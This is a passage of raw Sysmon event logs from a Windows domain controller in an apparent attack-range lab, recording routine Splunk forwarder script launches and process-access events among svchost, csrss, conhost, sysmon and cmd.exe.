Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002380Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.886{08A6967A-429D-6000-6E00-000000009A01}2920C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinNetMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002379Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.774{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-429D-6000-6D00-000000009A01}2756C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002378Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.774{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002377Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.774{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002376Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.774{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002375Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.774{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002374Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.774{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002373Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.774{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002372Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.774{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002371Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.774{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002370Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.774{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002369Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.774{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-429D-6000-6D00-000000009A01}2756C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002368Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.774{08A6967A-4298-6000-3400-000000009A01}23163944C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-429D-6000-6D00-000000009A01}2756C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002367Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.778{08A6967A-429D-6000-6D00-000000009A01}2756C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinHostMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002366Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.649{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-429D-6000-6C00-000000009A01}3980C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002365Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.649{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002364Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.649{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002363Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.649{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002362Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.649{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002361Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.649{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002360Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.649{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002359Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.649{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002358Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.649{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002357Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.649{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002356Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.649{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-429D-6000-6C00-000000009A01}3980C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002355Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.649{08A6967A-4298-6000-3400-000000009A01}23163944C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-429D-6000-6C00-000000009A01}3980C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002354Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.653{08A6967A-429D-6000-6C00-000000009A01}3980C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft 